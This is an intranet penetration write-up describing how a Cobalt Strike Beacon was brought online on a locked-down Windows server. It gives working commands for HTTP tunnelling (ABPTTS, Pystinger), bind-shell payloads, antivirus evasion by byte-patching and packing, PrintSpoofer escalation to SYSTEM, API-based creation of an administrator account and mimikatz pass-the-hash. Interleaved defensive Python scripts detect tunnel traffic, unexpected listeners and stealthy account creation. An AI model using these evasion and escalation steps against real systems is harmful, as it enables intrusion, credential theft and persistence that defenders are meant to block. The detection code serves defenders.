
Title: Intranet penetration: breaking through the security policy to bring CS online


Foreword

This article is the record of an intranet penetration engagement that used unconventional means to get past the target's security policies.

Environment description

Initial access was a web getshell. The webshell is Ice Scorpion, running as the .NET application-pool account, so its permissions are very low. The server is Windows Server 2016, and the target has no internet egress.

The host runs antivirus software (Tureng, a domestic AV, plus Microsoft's Windows Defender), AMSI is enabled by default, and there are additional policy restrictions on PowerShell.

TCP, ICMP and DNS cannot reach the outside, so it is impossible to connect directly to a CS server on the public internet (and an intranet CS server cannot reach the target either). The public internet cannot access the target's web service at all (it is a purely intranet web service).

The inbound policy is extremely strict. Inbound rules: only HTTP is allowed in, and only the two HTTP ports 80 and 8080 can be reached normally by intranet machines.

Outbound rules: ports other than 8080 are not allowed to communicate with the outside world.

I hand-drew a topology diagram; just refer to it.

Why bring CS online

The webshell's permissions are too low and too restricted, so a CS Beacon is needed in order to escalate. Because CS loads PE programs as reflective DLLs, it also helps bypass defences during sensitive operations such as grabbing passwords with mimikatz.

Likewise, dumping LSA to disk and then extracting hashes from the dump won't work: the webshell's permissions are too low, and dumping LSA requires at least administrator rights.

Moreover, the target's network environment is harsh: any communication other than HTTP is intercepted by the firewall, so a normal interactive shell cannot be established.

Point 1: Use Pystinger reverse proxy to launch cs

After reviewing the available material, I found that most articles on the internet use Pystinger for the intranet reverse proxy: the target machine's port is mapped over HTTP to the CS server's listening port, so the Beacon can come online without the CS server ever reaching the web service. But there is a problem here: the public CS server cannot access the target's web service; only machines on the same intranet can. So it is impossible to run Pystinger on the public CS server and reverse-proxy the target's port to its listener.

The workaround is to run a CS server directly on the intranet springboard machine and then do the Pystinger reverse proxy from there.

1. Start a local CS server on the springboard.

2. Configure a reverse listener as usual, listening on port 60020 (the figure shows 6002, missing a 0).

3. Upload proxy.aspx to the target server and access it.

4. Upload the stinger_server.exe to the target server and execute the command: start D:\stinger_server.exe 0.0.0.0


5. Run the client locally on the springboard machine: stinger_client -w http://10.1.1.1:8080/2.aspx -l 0.0.0.0 -p 4002


6. Apply AV evasion to the reverse bind payload, upload it to the target and execute it; it does not come online. tasklist shows that shell.exe is running, but no Beacon arrives, and Pystinger reports an error.

The end result is an error whose exact cause is unknown. It may be a problem with the target's web environment or with the reverse Beacon's communication.

So the Pystinger reverse-proxy approach failed.

Point 2: Forward proxy + forward shell to bring the target online through the public CS

Since the reverse proxy does not work, use a forward proxy and then connect with a forward (bind) shell.

The target machine has no egress, so another intranet machine that does (the springboard) is used to bring out the target's forward shell.

Schematic: the common HTTP tunnelling tools Neo-reGeorg and reGeorg (probably the two most used) work in most network environments, but not here. The springboard would be cut off from the CS server directly: the CS connect (forward-connection) request is issued by the springboard's Beacon, so the only way would be to push that Beacon itself through a SOCKS tunnel so its connect request reaches the forward shell's listening port. But because the target has no egress, once the springboard's Beacon enters the proxy tunnel it can no longer reach the CS server on the public internet. So only a port-to-port mapping is possible, and a SOCKS tunnel over HTTP cannot be used (my guess). ABPTTS is therefore used to build the HTTP tunnel.

Advantages of ABPTTS

Good resistance to traffic-signature detection

The tunnel it creates is very stable

1. Configure ABPTTS:

python abpttsfactory.py -o server

This generates the server-side scripts and initialises the configuration.


2. Upload the server script to the target machine

Point 3: File upload

Here neither Ice Scorpion nor the big-horse (dama) webshell could upload files; only Godzilla's large-file upload managed to upload abptts.aspx (the later EXE uploads also used Godzilla's large-file upload). The EXE files were another pitfall: in a normal environment we could use certutil, PowerShell and similar methods to download an EXE onto the target, but this machine has no egress, and because of the outbound rules it cannot even reach web servers on other intranet machines. In the end Godzilla's large-file upload solved it.

The address of abptts.aspx after the upload completes: http://10.1.1.1:8080/abptts.aspx

Visit abptts.aspx: the page echoes a long string of ciphertext, which indicates that the ABPTTS endpoint is working.

3. Start the HTTP tunnel

python abpttsclient.py -c server/config.txt -u 'http://10.1.1.1:8080/abptts.aspx' -f 127.0.0.1:7777/127.0.0.1:1111

Here 127.0.0.1:7777 is the port on the local (springboard) machine and 127.0.0.1:1111 is the port on the target machine.

It means that the target machine's 1111 port is mapped to the local port 7777 through the http tunnel, and all requests you send to the local port 7777 will be forwarded to the target machine's 1111 port.
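From the defender's side, the tunnel just described has a recognisable shape in the web server's own logs: one client issuing a steady stream of POST requests to a single dynamic page, with a request body on every hit, for as long as the tunnel is up. The Python below is an added example, not part of the original post or of the ABPTTS project. It runs that heuristic over constructed IIS W3C log lines; the field layout is IIS's default, but the log entries, the client addresses, the page name /abptts.aspx and the thresholds are assumptions that a defender would tune to their own environment.

```python
"""Heuristic detection of HTTP-tunnel traffic (ABPTTS / reGeorg style) in
IIS W3C logs.

Added example, not from the original post or any tunnelling project. Field
layout follows the IIS W3C default; the log entries, the page name
/abptts.aspx and the thresholds are constructed assumptions.
"""
from collections import defaultdict
from datetime import datetime

# Constructed log: an ordinary client browsing two pages, and a second client
# POSTing to one .aspx page once a second with a body on every request.
SAMPLE_LOG = (
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port "
    "cs-username c-ip cs(User-Agent) sc-status sc-bytes cs-bytes time-taken\n"
    "2022-01-19 22:00:01 10.1.1.1 GET /index.aspx - 8080 - 10.1.1.50 "
    "Mozilla/5.0 200 5120 300 15\n"
    "2022-01-19 22:00:03 10.1.1.1 GET /about.aspx - 8080 - 10.1.1.50 "
    "Mozilla/5.0 200 2048 280 12\n"
    + "\n".join(
        f"2022-01-19 22:01:{i:02d} 10.1.1.1 POST /abptts.aspx - 8080 - "
        f"10.1.1.20 python-requests/2.25 200 {900 + i} {1200 + i} 8"
        for i in range(40)
    )
)


def parse_w3c(text):
    """Yield one dict per log record, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) == len(fields):
            yield dict(zip(fields, parts))


def find_tunnel_candidates(text, window_seconds=60, min_requests=30,
                           min_post_ratio=0.9):
    """Return (client, page) pairs that receive at least min_requests hits
    inside some window of window_seconds, nearly all of them POSTs with a
    non-empty request body. One finding per pair is enough."""
    per_key = defaultdict(list)
    for rec in parse_w3c(text):
        ts = datetime.fromisoformat(f"{rec['date']} {rec['time']}")
        per_key[(rec["c-ip"], rec["cs-uri-stem"])].append(
            (ts, rec["cs-method"], int(rec["cs-bytes"]))
        )
    hits = []
    for (client, page), events in per_key.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide the window start forward until it spans <= window_seconds
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            window = events[start:end + 1]
            if len(window) < min_requests:
                continue
            posts = [e for e in window if e[1] == "POST" and e[2] > 0]
            ratio = len(posts) / len(window)
            if ratio >= min_post_ratio:
                hits.append({"client": client, "page": page,
                             "requests": len(window), "post_ratio": round(ratio, 2)})
                break
    return hits


if __name__ == "__main__":
    for h in find_tunnel_candidates(SAMPLE_LOG):
        print(f"{h['client']} -> {h['page']}: {h['requests']} requests, "
              f"POST ratio {h['post_ratio']}")
```

The same rate-of-POSTs signal is what a WAF or reverse proxy can alert on in real time; the point of the log-side check is that the page-level rule holds even when the tunnel's body encryption defeats content signatures, which is exactly the property the post credits ABPTTS with.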


Point 4: Forward bind with AV evasion

Introduction to CS's forward shell (Beacon TCP)

The principle of the forward shell is that the bind payload opens a listening port on the target machine and waits for another host to connect to it; the child Beacon accepts the connection from the parent Beacon rather than communicating with the CS server directly.

A reverse shell, by contrast, has the target initiate the connection to the CS server's listening port. Create a forward listener, then generate a forward payload (only stageless Beacon can be selected when generating a forward payload).

Why use a forward shell:

If the target's outbound rules are very strict and the target has no egress, a reverse shell cannot maintain communication with the CS server.

If a forward shell is used, no matter how strict the inbound rules are, they will not block communication between local ports, so the strict inbound policy can be bypassed.

Communication path: CS server (public internet) -- springboard machine (parent Beacon) -- springboard port 7777 -- target port 8080 (HTTP tunnel) -- target port 11111 (child Beacon).

Bypass analysis: on the target's firewall, local port 8080 talks to local port 1111, and the attacking machine is normally allowed to interact with the target's port 8080, so the traffic passes both the inbound and the outbound policy.

Forward bind AV evasion

As mentioned above, there are two antiviruses, Tureng and WD, so uploading the forward shell as-is would be killed instantly; a local test also flags it.

A reverse bind is relatively easy to evade: generate shellcode and load it with a separate loader or similar methods.

The forward shell, however, cannot be generated as shellcode. It is a stageless Beacon, and a stageless Beacon cannot be exported as shellcode, so it cannot bypass the antivirus through the usual separated-loader approach.

Let me note the difference between stager and stageless:

Stager type: contains only the simple loading logic; the stager pulls the C2 payload into memory and performs PE loading (reflective DLL loading). Stageless type: stager and payload are written into the trojan together, so it is larger and its features are more obvious than the stager type. As the figure shows, when generating shellcode there is no forward bind listener option, only the reverse listener option.

Since evasion by obfuscating a loader is not possible, the approach is packing plus locating and breaking the signature bytes. Most domestic antivirus products are probably signature-based, using fuzzy-hash matching: strong obfuscation at the code layer can bypass most of them, as can strong packers (ASPack, UPX, Safengine, VMProtect; in testing, ASPack and UPX were not very effective). Main tools used: VirTest 5.0, Resource Hacker, Safengine Shielden and UPX.

VirTest 5.0: locates the signature bytes automatically. Since I cannot write assembly, I used 010 Editor to edit the hex of the signature bytes directly and break the detected signature.

Other ways to modify signature bytes: replace assembly functions, reorder instructions, zero out jumps.

Note: after modifying the signature bytes, test whether the EXE still runs normally.

Safengine Shielden: select anti-LPK injection, anti-debugger attachment, anti-memory dump and full complexity; leave virtual-machine detection unchecked.

Finally, add a UPX layer (whether to add UPX depends on the situation; sometimes it causes detection), use Resource Hacker to add an arbitrary icon file, and the result passes Tureng.

Running the forward shell on the target

Upload the forward bind payload and run D:/beacon_se.exe from Ice Scorpion. You can see the trojan open port 1111 on the target. We then use the HTTP tunnel to connect to the forward bind on the target's port 11111.

Forward connection from this machine (the springboard)

Bring the local (attacker) machine online as the springboard, then run in its Beacon shell:

connect 127.0.0.1 7777


10.1.1.1 came online through the forward connection, but the Beacon's privileges are extremely low and mimikatz cannot run. Because it is a forward shell, even after a successful escalation the elevated shell cannot simply be sent back to us. And because the target is Server 2016, the common escalation scripts in the plugins fail.

PrintSpoofer escalation

Upload PrintSpoofer.exe to the target host.

Run the following command to start my forward shell with SYSTEM privileges; I then get a SYSTEM shell instead of the low-privileged ASP.NET one.

C:\Windows\Temp\PrintSpoofer -c D:/1111_se.exe


Run netstat -ano to confirm whether port 1111 is listening locally.
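The netstat check above is also the defender's check: the target's firewall never saw the bind listener, because Windows Firewall does not filter connections between local ports, so only a host-side inventory of listening sockets reveals it. The Python below is an added example, not from the original post. It parses the text formats of netstat -ano and tasklist /fo csv and reports every TCP listener outside an allow-list together with the owning process; the sample output, the allow-list of 80 and 8080 and the process names are constructed assumptions.

```python
"""Flag listening TCP ports on a Windows host that are not on an allow-list
and name the process that owns each one.

Added example, not from the original post. It parses the text output of
`netstat -ano` and `tasklist /fo csv`; the samples below are constructed,
and the allow-list assumes a host whose firewall only permits 80 and 8080.
"""
import csv
import io

# Constructed `netstat -ano` output: IIS on 80/8080 (PID 4 = http.sys in
# kernel) and an unexpected listener on 1111 owned by a user-mode process.
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1111           0.0.0.0:0              LISTENING       5212
  TCP    10.1.1.1:8080          10.1.1.20:51422        ESTABLISHED     4
  TCP    [::]:80                [::]:0                 LISTENING       4
  UDP    0.0.0.0:123            *:*                                    1304
"""

# Constructed `tasklist /fo csv` output.
TASKLIST_SAMPLE = """\
"Image Name","PID","Session Name","Session#","Mem Usage"
"System","4","Services","0","148 K"
"svchost.exe","1304","Services","0","9,212 K"
"beacon_se.exe","5212","Services","0","21,480 K"
"""

ALLOWED_PORTS = {80, 8080}


def pid_to_image(tasklist_csv):
    """Map PID -> image name from `tasklist /fo csv` output."""
    reader = csv.DictReader(io.StringIO(tasklist_csv))
    return {int(row["PID"]): row["Image Name"] for row in reader}


def listening_ports(netstat_text):
    """Yield (port, pid) for every TCP socket in LISTENING state."""
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0] != "TCP" or parts[3] != "LISTENING":
            continue
        port = int(parts[1].rsplit(":", 1)[1])  # also handles [::]:80
        yield port, int(parts[4])


def unexpected_listeners(netstat_text, tasklist_csv, allowed=ALLOWED_PORTS):
    """Listeners outside the allow-list, de-duplicated across v4/v6 sockets."""
    images = pid_to_image(tasklist_csv)
    seen = set()
    findings = []
    for port, pid in listening_ports(netstat_text):
        if port in allowed or (port, pid) in seen:
            continue
        seen.add((port, pid))
        findings.append({"port": port, "pid": pid,
                         "image": images.get(pid, "<unknown>")})
    return findings


if __name__ == "__main__":
    for f in unexpected_listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print(f"port {f['port']} listening, owned by PID {f['pid']} ({f['image']})")
```

Run it periodically (or from a scheduled task) and diff the result against the previous run; a listener that appears on a web server outside the documented ports, owned by a process in a writable directory such as D:\, is the event worth paging on.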

The forward shell is running normally; from the springboard machine, connect to the forward bind again.

connect 127.0.0.1 7777


Privilege escalation succeeded and the engagement was basically over: SYSTEM privileges were obtained. mimikatz grabbed credentials; there was no plaintext, but the hash could be recovered.

Bypassing the antivirus, adding a user and logging in to the desktop

Renamed net1 and used it to add a user: an error is reported, which means Tureng intercepted it, since it blocks from the driver layer. Next I tried to kill the antivirus directly at the driver layer.

Locally the antivirus could be killed this way, but for reasons I don't know it could not be done on the target. Change of approach: domestic antivirus (and others) usually intercept user-add commands only by watching the two processes net and net1, without hooking the underlying function, so directly calling the underlying API without running net or net1 bypasses the monitoring. I have not analysed the principle in depth; there are articles about it online.

Adding an administrator user through the Windows API

Project address: https://github.com/newsoft/adduser
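The defender's counterpart to the process-watching gap described above is the Security event log: a local account created through the API produces a 4720 (user account created) event just as net.exe does, because the event is written by the security subsystem when account-management auditing is on, not by the calling process. The Python below is an added example, not from the original post or the adduser project. It correlates constructed 4688, 4720 and 4732 records by logon session and separates creations that went through net.exe/net1.exe from those that did not; the field names are the Security log's, but every value (accounts svc_backup and support1, the logon ids, the path D:\adduser.exe) is constructed.

```python
"""Spot local account creation that did not go through net.exe / net1.exe.

Added example, not from the original post or the adduser project. The events
mimic Windows Security log records 4688 (process creation), 4720 (user
account created) and 4732 (member added to a local group); the field names
are the Security log's, but every value below is constructed.
"""
from datetime import datetime, timedelta

NET_TOOLS = {"net.exe", "net1.exe"}
ADMINISTRATORS_SID = "S-1-5-32-544"

# Constructed events. Logon 0x3e7 creates an account the usual way through
# net1.exe; logon 0x5a1c2 creates one from an arbitrary program via the API
# and then adds it to the local Administrators group.
SAMPLE_EVENTS = [
    {"EventID": 4688, "Time": "2022-01-19 23:05:00", "SubjectLogonId": "0x3e7",
     "NewProcessName": r"C:\Windows\System32\net1.exe"},
    {"EventID": 4720, "Time": "2022-01-19 23:05:01", "SubjectLogonId": "0x3e7",
     "SubjectUserName": "SYSTEM", "TargetUserName": "svc_backup",
     "TargetSid": "S-1-5-21-111-222-333-1105"},
    {"EventID": 4688, "Time": "2022-01-19 23:07:10", "SubjectLogonId": "0x5a1c2",
     "NewProcessName": r"D:\adduser.exe"},
    {"EventID": 4720, "Time": "2022-01-19 23:07:11", "SubjectLogonId": "0x5a1c2",
     "SubjectUserName": "SYSTEM", "TargetUserName": "support1",
     "TargetSid": "S-1-5-21-111-222-333-1106"},
    {"EventID": 4732, "Time": "2022-01-19 23:07:12", "SubjectLogonId": "0x5a1c2",
     "TargetSid": ADMINISTRATORS_SID, "MemberSid": "S-1-5-21-111-222-333-1106"},
]


def _ts(s):
    return datetime.fromisoformat(s)


def _image(path):
    """Lower-case file name of a Windows process path."""
    return path.rsplit("\\", 1)[-1].lower()


def account_creation_alerts(events, window=timedelta(seconds=30)):
    """One record per 4720 event, saying whether net.exe/net1.exe started in
    the same logon session within `window` beforehand. A 4720 without such a
    process is the API-level creation the post describes."""
    procs = [e for e in events if e["EventID"] == 4688]
    alerts = []
    for e in events:
        if e["EventID"] != 4720:
            continue
        t = _ts(e["Time"])
        via_net = any(
            p["SubjectLogonId"] == e["SubjectLogonId"]
            and _image(p["NewProcessName"]) in NET_TOOLS
            and t - window <= _ts(p["Time"]) <= t
            for p in procs
        )
        alerts.append({"account": e["TargetUserName"],
                       "creator": e["SubjectUserName"],
                       "logon_id": e["SubjectLogonId"],
                       "via_net_exe": via_net})
    return alerts


def admin_group_adds(events):
    """Accounts added to local Administrators (4732 on SID S-1-5-32-544),
    resolved to names through the SID recorded in the matching 4720."""
    names = {e["TargetSid"]: e["TargetUserName"]
             for e in events if e["EventID"] == 4720}
    return [names.get(e["MemberSid"], e["MemberSid"]) for e in events
            if e["EventID"] == 4732 and e["TargetSid"] == ADMINISTRATORS_SID]


if __name__ == "__main__":
    for a in account_creation_alerts(SAMPLE_EVENTS):
        how = "via net.exe" if a["via_net_exe"] else "via API (no net.exe)"
        print(f"{a['account']} created by {a['creator']} {how}")
    print("added to Administrators:", admin_group_adds(SAMPLE_EVENTS))
```

The practical lesson is that an alert keyed on the net.exe process name is a detection of the tool, not of the action; auditing 4720 and 4732 (and forwarding them off the host) catches the action however it was performed.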

With the antivirus bypassed, a user was added. Next came the routine operations: use the printer vulnerability (PrintSpoofer) to escalate, and with SYSTEM privileges switch to the Administrator user's desktop.

Pass-the-hash attack

Alternatively, pass the hash and land directly on the Administrator desktop:

sekurlsa::pth /user:Administrator /domain:Username /ntlm:194f34439dd27846db00c6723036da6b "/run:mstsc.exe /restrictedadmin"

The advantage of pass-the-hash is that it makes less noise: no new user is needed and fewer traces are left, which reduces the chance of the attacker being discovered, as shown in the figure.

As in the earlier operations, proxy the target's port 3389 through to the local machine and connect to it.

Finally, I attached a screenshot of the logged-in desktop. When I logged in, Backstab reported an error, which explains why I didn't succeed in killing Tureng earlier (it crashed due to a program compatibility issue).
